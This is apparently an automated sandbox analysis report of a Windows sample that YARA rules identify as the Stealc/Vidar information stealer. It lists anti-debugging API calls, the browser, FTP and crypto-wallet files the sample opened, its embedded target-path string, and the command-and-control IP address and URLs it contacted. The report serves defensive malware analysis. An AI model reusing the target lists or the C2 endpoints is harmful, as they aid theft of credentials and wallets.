Contains functionality to read the PEB
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00419750 mov eax, dword ptr fs:[00000030h] 0_2_00419750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_00417850
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041AD48
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0041CEEA SetUnhandledExceptionFilter, 0_2_0041CEEA
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041B33A
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBEB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CBEB66C
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBEB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CBEB1F7
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CD9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CD9AC62
Source: C:\Users\user\Desktop\NK3SASJheq.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: NK3SASJheq.exe PID: 636, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00419600
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBEB341 cpuid 0_2_6CBEB341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\NK3SASJheq.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00416920
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_00417850
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_00417A30
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.NK3SASJheq.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.NK3SASJheq.exe.2460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NK3SASJheq.exe.2410e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NK3SASJheq.exe.2410e67.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NK3SASJheq.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.NK3SASJheq.exe.2460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1836423523.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1488752523.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1835291289.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1836780262.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NK3SASJheq.exe PID: 636, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: NK3SASJheq.exe PID: 636, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe String found in binary or memory: Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|
Source: NK3SASJheq.exe String found in binary or memory: |\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe, 00000000.00000002.1836423523.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe String found in binary or memory: |\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|
Source: NK3SASJheq.exe String found in binary or memory: |\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets
Source: NK3SASJheq.exe String found in binary or memory: Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|
Source: NK3SASJheq.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: NK3SASJheq.exe String found in binary or memory: odus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\E
Source: NK3SASJheq.exe, 00000000.00000002.1836423523.0000000000A09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*>dl
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\NK3SASJheq.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: NK3SASJheq.exe PID: 636, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.NK3SASJheq.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.NK3SASJheq.exe.2460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NK3SASJheq.exe.2410e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NK3SASJheq.exe.2410e67.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NK3SASJheq.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.NK3SASJheq.exe.2460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1836423523.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1488752523.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1835291289.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1836780262.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NK3SASJheq.exe PID: 636, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: NK3SASJheq.exe PID: 636, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CDA0C40 sqlite3_bind_zeroblob, 0_2_6CDA0C40
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CDA0D60 sqlite3_bind_parameter_name, 0_2_6CDA0D60
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CCC8EA0 sqlite3_clear_bindings, 0_2_6CCC8EA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1540830 Sample: NK3SASJheq.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 26 Multi AV Scanner detection for domain / URL 2->26 28 Suricata IDS alerts for network traffic 2->28 30 Found malware configuration 2->30 32 9 other signatures 2->32 6 NK3SASJheq.exe 58 2->6         started        process3 dnsIp4 24 62.204.41.176, 49704, 80 TNNET-ASTNNetOyMainnetworkFI United Kingdom 6->24 14 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 6->14 dropped 16 C:\Users\user\AppData\...\softokn3[1].dll, PE32 6->16 dropped 18 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 6->18 dropped 20 9 other files (none is malicious) 6->20 dropped 34 Detected unpacking (changes PE section rights) 6->34 36 Detected unpacking (overwrites its own PE header) 6->36 38 Found many strings related to Crypto-Wallets (likely being stolen) 6->38 40 6 other signatures 6->40 11 WerFault.exe 19 16 6->11         started        file5 signatures6 process7 file8 22 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->22 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
62.204.41.176
 unknown United Kingdom
30798 TNNET-ASTNNetOyMainnetworkFI true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://62.204.41.176/db293a2c1b1c70c4/mozglue.dll true
    		unknown
    http://62.204.41.176/db293a2c1b1c70c4/nss3.dll true
      		unknown
      http://62.204.41.176/db293a2c1b1c70c4/softokn3.dll true
        		unknown
        http://62.204.41.176/db293a2c1b1c70c4/vcruntime140.dll true
          		unknown
          http://62.204.41.176/edd20096ecef326d.php true
            		unknown
            http://62.204.41.176/db293a2c1b1c70c4/sqlite3.dll true
              		unknown
              http://62.204.41.176/db293a2c1b1c70c4/freebl3.dll true
                		unknown
                http://62.204.41.176/db293a2c1b1c70c4/msvcp140.dll true
                  		unknown
                  http://62.204.41.176/ true
                    		unknown